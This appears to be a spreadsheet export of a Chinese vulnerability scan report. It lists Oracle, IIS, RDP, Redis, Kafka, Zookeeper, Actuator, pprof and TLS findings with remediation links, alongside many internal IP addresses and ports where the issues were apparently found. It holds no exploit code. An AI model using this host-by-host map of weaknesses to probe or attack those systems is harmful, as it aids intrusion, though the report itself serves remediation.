  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2592）</t>
  </si>
  <si>
    <t>影响oracle:9.0.1.5版本,9.2.0.8版本,10.1.0.5版本,10.2.0.4版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>Oracle Ultra Search组件未明漏洞（CVE-2008-0347）</t>
  </si>
  <si>
    <t>影响oracle:9.0.1.5版本,9.2.0.8版本,10.1.0.5版本,10.2.0.3版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html</t>
  </si>
  <si>
    <t>Oracle Database 组件"Workspace Manager "未明安全漏洞(CVE-2008-3983)</t>
  </si>
  <si>
    <t>ips-15724（有效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html?_template=/o</t>
  </si>
  <si>
    <t>https://www.oracle.com/index.html</t>
  </si>
  <si>
    <t>Oracle Database Suite 组件"Workspace Manager " 未明安全漏洞</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.oracle.com/index.html</t>
  </si>
  <si>
    <t>Oracle Database Suite 组件"Change Data Capture " 未明安全漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.4版本,11.1.0.6 版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpuoct2008-100482.html</t>
  </si>
  <si>
    <t>Oracle数据库服务器CREATE ANY DIRECTORY权限提升漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.2版本(含)到10.1.0.5版本(含),10.2.0.1版本(含)到10.2.0.3版本(含),11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.oracle.com</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2591）</t>
  </si>
  <si>
    <t>影响oracle:9.2.0.8版本,10.2.0.3版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>Oracle 2008年4月更新修复多个安全漏洞（CVE-2008-1818）</t>
  </si>
  <si>
    <t>Oracle 2009年1月紧急补丁更新修复多个漏洞(CVE-2008-5437)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle ---------  目前 Oracle 已经发布 Oracle 数据库最新版本, 请到厂商的官方页面下载最新版本:  链接：http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html?_template=/o</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2600）</t>
  </si>
  <si>
    <t>Oracle 2008年4月更新修复多个安全漏洞(CVE-2008-1817)</t>
  </si>
  <si>
    <t>影响oracle:10.1.0.5版本,10.2.0.3版本,9.2.0.8版本,9.0.1.5版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>"厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpuapr2008）以及相应补丁:cpuapr2008：Oracle Critical Patch Update Advisory - April 2008链接：http://www.oracle.com/technetwork/topics/security/cpuapr2008-082075.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/topics/security/cpuapr2008-082075.html</t>
  </si>
  <si>
    <t>Oracle PeopleTools组件未明漏洞(CVE-2008-0349)</t>
  </si>
  <si>
    <t>影响oracle:9.0.1.5版本,9.2.0.8版本,10.1.0.5版本,10.2.0.2版本(含)到10.2.0.3版本(含),11.1.0.6版本</t>
  </si>
  <si>
    <t>http://www.us-cert.gov/cas/techalerts/TA08-017A.html
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html
http://marc.info/?l=bugtraq&amp;amp;m=120058413923005&amp;amp;w=2</t>
  </si>
  <si>
    <t>Oracle Database 组件Workspace Manager 未明身份认证和访问控制漏洞</t>
  </si>
  <si>
    <t>影响oracle:11.1.0.6版本,11.1.0.7版本,10.2.0.3版本,10.2.0.4版本,10.1.0.5版本,9.2.0.8版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html?_template=/o</t>
  </si>
  <si>
    <t>Oracle Database 组件Workspace Manager 未明身份认证和权限管理漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.4版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>Oracle Database 组件Password Policy 未明身份认证和权限管理漏洞</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2613）</t>
  </si>
  <si>
    <t>厂商已经发布了更新程序修补漏洞。有关更新程序的更多信息，请查看以下链接：http://www.oracle.com/technetwork/topics/security/cpujul2008-090335.html</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2602）</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（cpujul2008）以及相应补丁: http://www.oracle.com/technetwork/topics/security/cpujul2008-090335.html</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2605）</t>
  </si>
  <si>
    <t>Oracle 2008年7月紧急补丁更新修复多个漏洞（CVE-2008-2611）</t>
  </si>
  <si>
    <t>Oracle 2008年10月紧急补丁更新修复多个漏洞（CVE-2008-4005）</t>
  </si>
  <si>
    <t xml:space="preserve"> 厂商补丁：Oracle ------ Oracle已经为此发布了一个安全公告（cpuoct2008）以及相应补丁: cpuoct2008：Oracle Critical Patch Update Advisory - October 2008 链接：http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html</t>
  </si>
  <si>
    <t>Oracle Database 核心RDBMS组件未明漏洞（CVE-2008-0345）</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------ 目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html</t>
  </si>
  <si>
    <t>Oracle Database Spatial组件未明漏洞（CVE-2008-0343)</t>
  </si>
  <si>
    <t>影响oracle:9.2.0.8版本,10.1.0.5版本,9.0.1.5版本,10.2.0.2版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：   http://www.oracle.com/technetwork/topics/security/cpujan2008-086860.html</t>
  </si>
  <si>
    <t>http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2008.html</t>
  </si>
  <si>
    <t>Oracle Database Spatial组件未明漏洞(CVE-2008-0344)</t>
  </si>
  <si>
    <t>Oracle Application Server Jinitiator组件未明漏洞(CVE-2008-0346)</t>
  </si>
  <si>
    <t>Oracle PeopleTools组件未明漏洞(CVE-2008-0348)</t>
  </si>
  <si>
    <t>Oracle Database 组件"Workspace Manager "未明安全漏洞(CVE-2008-3982)</t>
  </si>
  <si>
    <t>ips-15723（有效）</t>
  </si>
  <si>
    <t>Oracle Database 组件"Workspace Manager "未明安全漏洞(CVE-2008-3984)</t>
  </si>
  <si>
    <t>ips-15725（有效）</t>
  </si>
  <si>
    <t>Oracle Database 组件Database Vault 未明身份认证和权限管理漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.4版本,11.1.0.6版本,9.2.0.8版本</t>
  </si>
  <si>
    <t>Oracle Resource Manager SQLX Functions身份认证和访问控制漏洞</t>
  </si>
  <si>
    <t>影响oracle:10.2.0.3版本,11.1.0.6版本</t>
  </si>
  <si>
    <t>ips-15515（有效）</t>
  </si>
  <si>
    <t>Oracle Database 组件Database Vault 未明身份认证和访问控制漏洞</t>
  </si>
  <si>
    <t>Redis服务器不受密码验证的保护</t>
  </si>
  <si>
    <t>6379</t>
  </si>
  <si>
    <t>远程攻击者可利用此问题获取受影响系统的管理访问权限</t>
  </si>
  <si>
    <t>参见《Redis服务器不受密码验证的保护-修复方案》</t>
  </si>
  <si>
    <t>https://redis.io/commands/auth/</t>
  </si>
  <si>
    <t>http://192.168.22.81:8040</t>
  </si>
  <si>
    <t>8040</t>
  </si>
  <si>
    <t>http://192.168.22.81:8003</t>
  </si>
  <si>
    <t>8003</t>
  </si>
  <si>
    <t>http://192.168.22.81:80</t>
  </si>
  <si>
    <t>http://192.168.22.81:39</t>
  </si>
  <si>
    <t>http://192.168.22.81:8999</t>
  </si>
  <si>
    <t>8999</t>
  </si>
  <si>
    <t>允许HTTP TRACE / TRACK方法</t>
  </si>
  <si>
    <t>通过一个跨站追踪攻击窃取cookies和验证信任</t>
  </si>
  <si>
    <t>如果不使用该服务就禁用它</t>
  </si>
  <si>
    <t>http://www.apacheweek.com/issues/03-01-24
https://download.oracle.com/sunalerts/1000718.1.html
https://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201001-256
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200412-533
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200901-175</t>
  </si>
  <si>
    <t>IIS重复参数请求拒绝服务漏洞(CVE-2010-1899)</t>
  </si>
  <si>
    <t>ips-10071047（无效）</t>
  </si>
  <si>
    <t>IIS: 7.5</t>
  </si>
  <si>
    <t>影响IIS:6.0版本,7.5版本</t>
  </si>
  <si>
    <t>临时处理办法：: * 在IIS服务器上临时禁用ASP。 厂商解决方案：: Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-065）以及相应补丁: MS10-065：Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960) 链接：https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065</t>
  </si>
  <si>
    <t>http://192.168.1.110:80</t>
  </si>
  <si>
    <t>IIS FastCGI请求头远程溢出漏洞(CVE-2010-2730)</t>
  </si>
  <si>
    <t>ips-11021407（无效）</t>
  </si>
  <si>
    <t>影响IIS:7.5版本</t>
  </si>
  <si>
    <t>临时处理办法：: * 禁用FastCGI。 厂商解决方案：: Microsoft --------- Microsoft已经为此发布了一个安全公告（MS10-065）以及相应补丁: MS10-065：Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960) 链接：https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065</t>
  </si>
  <si>
    <t>http://192.168.1.110:99</t>
  </si>
  <si>
    <t>99</t>
  </si>
  <si>
    <t>http://192.168.1.110:7080</t>
  </si>
  <si>
    <t>7080</t>
  </si>
  <si>
    <t>http://192.168.1.110:90</t>
  </si>
  <si>
    <t>90</t>
  </si>
  <si>
    <t>MS12-020：远程桌面中的漏洞可能允许远程执行代码(CVE-2012-0002)</t>
  </si>
  <si>
    <t>ips-10010062, ips-10010063, ips-10010064, ips-10010065, ips-10010066, ips-10010311, ips-10010312, ips-10010313, ips-10010314, ips-10010315, ips-10011176, ips-10011177（有效）</t>
  </si>
  <si>
    <t>攻击者可利用该漏洞在远程主机上面执行任意代码。</t>
  </si>
  <si>
    <t>Microsoft已发布了一组针对Windows XP，2003，Vista，2008、7和2008 R2的补丁程序。请注意，需要与Microsoft的扩展支持合同才能为Windows 2000获得此漏洞的补丁：https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020</t>
  </si>
  <si>
    <t>http://192.168.1.110:80/</t>
  </si>
  <si>
    <t>http://192.168.22.55:8999</t>
  </si>
  <si>
    <t>http://192.168.22.55:9992</t>
  </si>
  <si>
    <t>http://192.168.22.55:9993/</t>
  </si>
  <si>
    <t>http://192.168.22.55:8003</t>
  </si>
  <si>
    <t>http://192.168.22.55:80/</t>
  </si>
  <si>
    <t>http://192.168.22.55:9190</t>
  </si>
  <si>
    <t>http://192.168.22.55:9991</t>
  </si>
  <si>
    <t>http://192.168.22.55:9996/</t>
  </si>
  <si>
    <t>http://192.168.22.55:9992/</t>
  </si>
  <si>
    <t>http://192.168.22.55:9995/</t>
  </si>
  <si>
    <t>http://192.168.22.55:9991/</t>
  </si>
  <si>
    <t>http://192.168.22.55:9994</t>
  </si>
  <si>
    <t>http://192.168.22.55:39</t>
  </si>
  <si>
    <t>http://192.168.22.55:9995</t>
  </si>
  <si>
    <t>http://192.168.22.55:80</t>
  </si>
  <si>
    <t>http://192.168.22.55:9994/</t>
  </si>
  <si>
    <t>FTP 匿名登录</t>
  </si>
  <si>
    <t>远程攻击者可以利用此漏洞访问敏感信息</t>
  </si>
  <si>
    <t>参见《FTP 匿名登录-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/xinj/p/15787677.html</t>
  </si>
  <si>
    <t>http://192.168.22.55:8040</t>
  </si>
  <si>
    <t>http://192.168.22.55:9993</t>
  </si>
  <si>
    <t>http://192.168.22.55:9996</t>
  </si>
  <si>
    <t>http://192.168.22.54:10082</t>
  </si>
  <si>
    <t>http://192.168.22.54:19850</t>
  </si>
  <si>
    <t>http://192.168.22.54:19850/</t>
  </si>
  <si>
    <t>http://192.168.22.54:8020</t>
  </si>
  <si>
    <t>8020</t>
  </si>
  <si>
    <t>http://192.168.22.54:19080/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>http://192.168.22.54:19850/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>http://192.168.22.54:8020/</t>
  </si>
  <si>
    <t>http://192.168.22.54:80/</t>
  </si>
  <si>
    <t>http://192.168.22.54:80</t>
  </si>
  <si>
    <t>http://192.168.22.54:19080</t>
  </si>
  <si>
    <t>http://172.16.5.75:9081</t>
  </si>
  <si>
    <t>9081</t>
  </si>
  <si>
    <t>cookie 没有设置httponly标志位</t>
  </si>
  <si>
    <t>https://172.16.5.75:8444</t>
  </si>
  <si>
    <t>8444</t>
  </si>
  <si>
    <t>为SetCookie配置HttpOnly属性</t>
  </si>
  <si>
    <t>http://172.16.5.75:1117</t>
  </si>
  <si>
    <t>1117</t>
  </si>
  <si>
    <t>http://172.16.5.75:8080</t>
  </si>
  <si>
    <t>http://172.16.5.20:80</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000</t>
  </si>
  <si>
    <t>8000</t>
  </si>
  <si>
    <t>http://172.16.5.20:8090</t>
  </si>
  <si>
    <t>8090</t>
  </si>
  <si>
    <t>http://172.16.5.85:60070</t>
  </si>
  <si>
    <t>60070</t>
  </si>
  <si>
    <t>用友NC wsncapplet.jsp 信息泄漏漏洞</t>
  </si>
  <si>
    <t>http://172.16.5.20:8000/jsp/wsncapplet.jsp</t>
  </si>
  <si>
    <t>联系厂商获取补丁https://www.yonyou.com</t>
  </si>
  <si>
    <t>https://www.yonyou.com</t>
  </si>
  <si>
    <t>http://172.16.5.85:9518</t>
  </si>
  <si>
    <t>9518</t>
  </si>
  <si>
    <t>http://172.16.5.85:9509</t>
  </si>
  <si>
    <t>9509</t>
  </si>
  <si>
    <t>http://172.16.5.85:9503</t>
  </si>
  <si>
    <t>9503</t>
  </si>
  <si>
    <t>http://172.16.5.85:9506</t>
  </si>
  <si>
    <t>9506</t>
  </si>
  <si>
    <t>http://172.16.5.84:18088</t>
  </si>
  <si>
    <t>18088</t>
  </si>
  <si>
    <t>http://172.16.5.84:60070</t>
  </si>
  <si>
    <t>http://172.16.5.84:9503</t>
  </si>
  <si>
    <t>http://172.16.5.84:9506</t>
  </si>
  <si>
    <t>http://172.16.5.84:9518</t>
  </si>
  <si>
    <t>http://172.16.5.84:9509</t>
  </si>
  <si>
    <t>http://172.16.6.43:4040</t>
  </si>
  <si>
    <t>http://172.16.6.43:18042</t>
  </si>
  <si>
    <t>18042</t>
  </si>
  <si>
    <t>http://172.16.6.43:9502</t>
  </si>
  <si>
    <t>9502</t>
  </si>
  <si>
    <t>http://172.16.6.43:9501</t>
  </si>
  <si>
    <t>9501</t>
  </si>
  <si>
    <t>http://172.16.6.43:60075</t>
  </si>
  <si>
    <t>60075</t>
  </si>
  <si>
    <t>http://172.16.6.43:9504</t>
  </si>
  <si>
    <t>9504</t>
  </si>
  <si>
    <t>http://172.16.6.43:18480</t>
  </si>
  <si>
    <t>18480</t>
  </si>
  <si>
    <t>http://172.16.6.43:9508</t>
  </si>
  <si>
    <t>9508</t>
  </si>
  <si>
    <t>http://172.16.6.41:18042</t>
  </si>
  <si>
    <t>http://172.16.6.41:9502</t>
  </si>
  <si>
    <t>http://172.16.6.41:60075</t>
  </si>
  <si>
    <t>9519</t>
  </si>
  <si>
    <t>http://172.16.6.41:9501</t>
  </si>
  <si>
    <t>http://172.16.6.41:19888</t>
  </si>
  <si>
    <t>19888</t>
  </si>
  <si>
    <t>http://172.16.6.41:9519</t>
  </si>
  <si>
    <t>http://172.16.6.41:18480</t>
  </si>
  <si>
    <t>http://172.16.6.41:9504</t>
  </si>
  <si>
    <t>http://172.16.6.42:4040</t>
  </si>
  <si>
    <t>http://172.16.6.42:18042</t>
  </si>
  <si>
    <t>Host头攻击 安全漏洞</t>
  </si>
  <si>
    <t>http://172.16.6.42:4040/</t>
  </si>
  <si>
    <t>可能导致HTML注入，XSS漏洞等。</t>
  </si>
  <si>
    <t>参见《Host头攻击 安全漏洞-修复方案》</t>
  </si>
  <si>
    <t>https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection</t>
  </si>
  <si>
    <t>http://172.16.6.42:18042/</t>
  </si>
  <si>
    <t>http://172.16.6.42:9504</t>
  </si>
  <si>
    <t>http://172.16.6.42:9501</t>
  </si>
  <si>
    <t>http://172.16.6.42:18480</t>
  </si>
  <si>
    <t>http://172.16.6.42:9508</t>
  </si>
  <si>
    <t>http://172.16.6.42:60075</t>
  </si>
  <si>
    <t>http://172.16.5.35:7070</t>
  </si>
  <si>
    <t>7070</t>
  </si>
  <si>
    <t>http://172.16.6.42:9502</t>
  </si>
  <si>
    <t>http://172.16.5.35:9090/</t>
  </si>
  <si>
    <t>9090</t>
  </si>
  <si>
    <t>服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)</t>
  </si>
  <si>
    <t>使用SSL开启重协商的服务都会受该漏洞影响</t>
  </si>
  <si>
    <t>Apache解决办法：升级到Apache 2.2.15以后版本IIS解决办法：IIS 5.0启用SSL服务时，也会受影响。可以升级IIS 6.0到更高的版本。Lighttpd解决办法：建议升级到lighttpd 1.4.30或者更高,并设置ssl.disable-client-renegotiation = enable。Nginx解决办法：0.7.x升级到nginx 0.7.64 ,0.8.x升级到 0.8.23 以及更高版本。Tomcat解决办法：使用NIO connector代替BIO connector，因为NIO不支持重协商，参考如下配置：&lt;Connector protocol=org.apache.coyote.http11.Http11NioProtocol&gt;（可能会影响Tomcat性能）Squid解决办法:升级到3.5.24以及以后版本其它服务解决方案请联系各应用厂商确认关闭重协商的方法如果扫描器跟目标机之间存在WAF，请优先检查WAF配置。</t>
  </si>
  <si>
    <t>https://172.16.5.31:8444</t>
  </si>
  <si>
    <t>http://172.16.5.31:9090</t>
  </si>
  <si>
    <t>http://172.16.5.31:8080</t>
  </si>
  <si>
    <t>http://172.16.5.31:88</t>
  </si>
  <si>
    <t>88</t>
  </si>
  <si>
    <t>http://172.16.5.31:9081</t>
  </si>
  <si>
    <t>https://172.16.5.31:9443</t>
  </si>
  <si>
    <t>9443</t>
  </si>
  <si>
    <t>http://172.16.5.31:1117</t>
  </si>
  <si>
    <t>http://172.16.5.31:9090/</t>
  </si>
  <si>
    <t>pprof 信息泄露漏洞</t>
  </si>
  <si>
    <t>http://172.16.5.83:6060/debug/pprof/</t>
  </si>
  <si>
    <t>6060</t>
  </si>
  <si>
    <t>参考官方规范禁止将调试信息暴露在公网。</t>
  </si>
  <si>
    <t>https://blog.csdn.net/Meepoljd/article/details/131120377</t>
  </si>
  <si>
    <t>http://172.16.5.83:86</t>
  </si>
  <si>
    <t>86</t>
  </si>
  <si>
    <t>http://172.16.5.83:8006</t>
  </si>
  <si>
    <t>8006</t>
  </si>
  <si>
    <t>http://172.16.5.83:9527</t>
  </si>
  <si>
    <t>9527</t>
  </si>
  <si>
    <t>http://172.16.5.83:8887/</t>
  </si>
  <si>
    <t>SpringBoot Actuator 未授权访问漏洞</t>
  </si>
  <si>
    <t>ips-11026590（无效）</t>
  </si>
  <si>
    <t>http://172.16.5.83:8006/actuator/info</t>
  </si>
  <si>
    <t>增加认证</t>
  </si>
  <si>
    <t>http://172.16.5.83:8090/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>Exporter metrics 未授权访问</t>
  </si>
  <si>
    <t>http://172.16.5.83:9121/metrics</t>
  </si>
  <si>
    <t>9121</t>
  </si>
  <si>
    <t>Exporter存在未授权访问，攻击者可以利用它来获取敏感信息或者进行未授权的操作</t>
  </si>
  <si>
    <t xml:space="preserve">为了防止攻击者利用此漏洞，应该始终保持Exporter的访问控制和授权设置https://blog.51cto.com/u_16175432/8165482 </t>
  </si>
  <si>
    <t>https://blog.51cto.com/u_16175432/8165482</t>
  </si>
  <si>
    <t>http://172.16.5.83:8077</t>
  </si>
  <si>
    <t>8077</t>
  </si>
  <si>
    <t>http://172.16.5.83:9505</t>
  </si>
  <si>
    <t>9505</t>
  </si>
  <si>
    <t>http://172.16.5.83:9121</t>
  </si>
  <si>
    <t>http://172.16.5.83:9533</t>
  </si>
  <si>
    <t>9533</t>
  </si>
  <si>
    <t>http://172.16.5.83:9516</t>
  </si>
  <si>
    <t>9516</t>
  </si>
  <si>
    <t>http://172.16.5.83:80</t>
  </si>
  <si>
    <t>http://172.16.5.83:9513</t>
  </si>
  <si>
    <t>9513</t>
  </si>
  <si>
    <t>http://172.16.5.83:82</t>
  </si>
  <si>
    <t>82</t>
  </si>
  <si>
    <t>http://172.16.5.83:9515</t>
  </si>
  <si>
    <t>9515</t>
  </si>
  <si>
    <t>http://172.16.5.86:9091</t>
  </si>
  <si>
    <t>9091</t>
  </si>
  <si>
    <t>http://172.16.5.86:8006</t>
  </si>
  <si>
    <t>http://172.16.5.86:9527</t>
  </si>
  <si>
    <t>http://172.16.5.86:86</t>
  </si>
  <si>
    <t>http://172.16.5.86:9533</t>
  </si>
  <si>
    <t>http://172.16.5.86:9525</t>
  </si>
  <si>
    <t>9525</t>
  </si>
  <si>
    <t>http://172.16.5.86:80</t>
  </si>
  <si>
    <t>http://172.16.5.86:82</t>
  </si>
  <si>
    <t>http://172.16.5.86:8077</t>
  </si>
  <si>
    <t>http://172.16.5.86:9121</t>
  </si>
  <si>
    <t>http://172.16.5.86:9515</t>
  </si>
  <si>
    <t>http://172.16.5.86:9513</t>
  </si>
  <si>
    <t>http://172.16.5.86:9090</t>
  </si>
  <si>
    <t>http://172.16.5.86:9516</t>
  </si>
  <si>
    <t>http://172.16.5.86:8006/</t>
  </si>
  <si>
    <t>http://172.16.5.86:9091/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.86:9121/metrics</t>
  </si>
  <si>
    <t>http://172.16.5.86:9090/metrics</t>
  </si>
  <si>
    <t>http://172.16.5.86:9090/</t>
  </si>
  <si>
    <t>http://172.16.5.86:8006/actuator/info</t>
  </si>
  <si>
    <t>http://172.16.5.86:6060/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.86:9090/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.86:9091/metrics</t>
  </si>
  <si>
    <t>http://172.16.5.86:8891/metrics</t>
  </si>
  <si>
    <t>8891</t>
  </si>
  <si>
    <t>Kafka 未授权访问漏洞</t>
  </si>
  <si>
    <t>9092</t>
  </si>
  <si>
    <t>未经授权的访问可能导致恶意用户或攻击者获取敏感数据或篡改数据</t>
  </si>
  <si>
    <t>1.通过配置适当的访问控制列表（ACL）来限制对主题的访问权限。ACL可以定义哪些用户或组可以读取或写入特定的主题2.身份验证和授权：使用身份验证和授权机制，例如基于用户名/密码的认证、SSL/TLS证书、Kerberos等，确保只有经过身份验证的用户才能访问主题3.加密通信：使用SSL/TLS等加密协议保护生产者和消费者与Kafka集群之间的通信，防止数据在传输过程中被窃取或篡改</t>
  </si>
  <si>
    <t>https://doc.knowstreaming.com/study-kafka/7-safety#74-%E6%8E%88%E6%9D%83%E5%92%8C-acl</t>
  </si>
  <si>
    <t>http://172.16.5.86:9505</t>
  </si>
  <si>
    <t>http://172.16.5.86:8090/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>Apache Zookeeper 未授权访问漏洞</t>
  </si>
  <si>
    <t>攻击者可通过执行envi命令获得系统大量的敏感信息，包括系统名称、Java环境。</t>
  </si>
  <si>
    <t>参见《Apache Zookeeper 未授权访问漏洞-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/aongao/p/14366127.html
https://issues.apache.org/jira/browse/ZOOKEEPER-1392
https://zookeeper.apache.org/security.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201905-954</t>
  </si>
  <si>
    <t>http://172.16.5.86:9091/</t>
  </si>
  <si>
    <t>http://172.16.5.86:9020/</t>
  </si>
  <si>
    <t>9020</t>
  </si>
  <si>
    <t>http://172.16.5.86:8875/</t>
  </si>
  <si>
    <t>8875</t>
  </si>
  <si>
    <t>http://172.16.5.86:8887/</t>
  </si>
  <si>
    <t>http://192.168.1.103:8066</t>
  </si>
  <si>
    <t>8066</t>
  </si>
  <si>
    <t>http://192.168.1.103:80</t>
  </si>
  <si>
    <t>http://192.168.1.103:10082</t>
  </si>
  <si>
    <t>http://192.168.1.103:81</t>
  </si>
  <si>
    <t>81</t>
  </si>
  <si>
    <t>http://192.168.1.11:8066</t>
  </si>
  <si>
    <t>http://192.168.1.11:80</t>
  </si>
  <si>
    <t>http://192.168.1.11:10082</t>
  </si>
  <si>
    <t>http://192.168.1.11:81</t>
  </si>
  <si>
    <t>http://192.168.22.60:80</t>
  </si>
  <si>
    <t>http://192.168.22.60:8020</t>
  </si>
  <si>
    <t>http://192.168.22.60:4487</t>
  </si>
  <si>
    <t>4487</t>
  </si>
  <si>
    <t>http://192.168.22.60:19080</t>
  </si>
  <si>
    <t>http://192.168.22.60:19080/v2/api-docs</t>
  </si>
  <si>
    <t>Web服务器默认欢迎页面泄露</t>
  </si>
  <si>
    <t>此漏洞没有影响。</t>
  </si>
  <si>
    <t>如果不使用此服务，建议将其禁用。</t>
  </si>
  <si>
    <t>http://192.168.22.60:10082</t>
  </si>
  <si>
    <t>http://192.168.1.109:39</t>
  </si>
  <si>
    <t>http://192.168.1.109:8066</t>
  </si>
  <si>
    <t>http://192.168.1.109:2024</t>
  </si>
  <si>
    <t>2024</t>
  </si>
  <si>
    <t>http://192.168.1.109:9991</t>
  </si>
  <si>
    <t>http://192.168.1.109:10082</t>
  </si>
  <si>
    <t>http://192.168.1.109:9992</t>
  </si>
  <si>
    <t>http://192.168.1.109:8220</t>
  </si>
  <si>
    <t>8220</t>
  </si>
  <si>
    <t>http://192.168.1.109:2021</t>
  </si>
  <si>
    <t>2021</t>
  </si>
  <si>
    <t>http://192.168.1.109:8040</t>
  </si>
  <si>
    <t>http://192.168.1.109:80</t>
  </si>
  <si>
    <t>http://192.168.1.109:9190</t>
  </si>
  <si>
    <t>http://192.168.1.109:9996</t>
  </si>
  <si>
    <t>http://192.168.1.109:9995</t>
  </si>
  <si>
    <t>http://192.168.1.109:9993</t>
  </si>
  <si>
    <t>http://192.168.1.109:9994</t>
  </si>
  <si>
    <t>http://192.168.1.109:19080</t>
  </si>
  <si>
    <t>http://192.168.1.109:19850</t>
  </si>
  <si>
    <t>http://192.168.1.109:19080/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>http://192.168.1.109:9993/</t>
  </si>
  <si>
    <t>http://192.168.1.109:9996/</t>
  </si>
  <si>
    <t>http://192.168.1.109:19850/swagger-ui.html#/api-memory-controller</t>
  </si>
  <si>
    <t>21</t>
  </si>
  <si>
    <t>http://192.168.1.109:8066/</t>
  </si>
  <si>
    <t>http://192.168.1.109:8220/</t>
  </si>
  <si>
    <t>Redis 未授权访问漏洞</t>
  </si>
  <si>
    <t>ips-11000283（有效）</t>
  </si>
  <si>
    <t>影响所有未开启认证访问的 Redis。</t>
  </si>
  <si>
    <t>参见《Redis 未授权访问漏洞-修复方案》</t>
  </si>
  <si>
    <t>https://redis.io/commands/auth/
http://static.nosec.org/download/redis_crackit_v1.1.pdf</t>
  </si>
  <si>
    <t>http://192.168.1.109:9991/</t>
  </si>
  <si>
    <t>http://192.168.1.109:9995/</t>
  </si>
  <si>
    <t>http://192.168.1.109:9994/</t>
  </si>
  <si>
    <t>http://192.168.1.109:9992/</t>
  </si>
  <si>
    <t>http://192.168.1.109:80/</t>
  </si>
  <si>
    <t>http://192.168.1.109:19850/</t>
  </si>
  <si>
    <t>8060</t>
  </si>
  <si>
    <t>SSL DROWN 攻击漏洞（使用过时和脆弱加密算法解密 RSA）(CVE-2016-0800)</t>
  </si>
  <si>
    <t>中间人攻击者可利用此问题，使用之前捕获的流量与弱加密，以及针对使用相同私钥的 SSLv2 服务器特别构建的一系列连接，来解密 TLS 连接。</t>
  </si>
  <si>
    <t>参见《SSL DROWN 攻击漏洞（使用过时和脆弱加密算法解密 RSA）(CVE-2016-0800)-修复方案》</t>
  </si>
  <si>
    <t>https://drownattack.com/
https://drownattack.com/drown-attack-paper.pdf
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201603-001
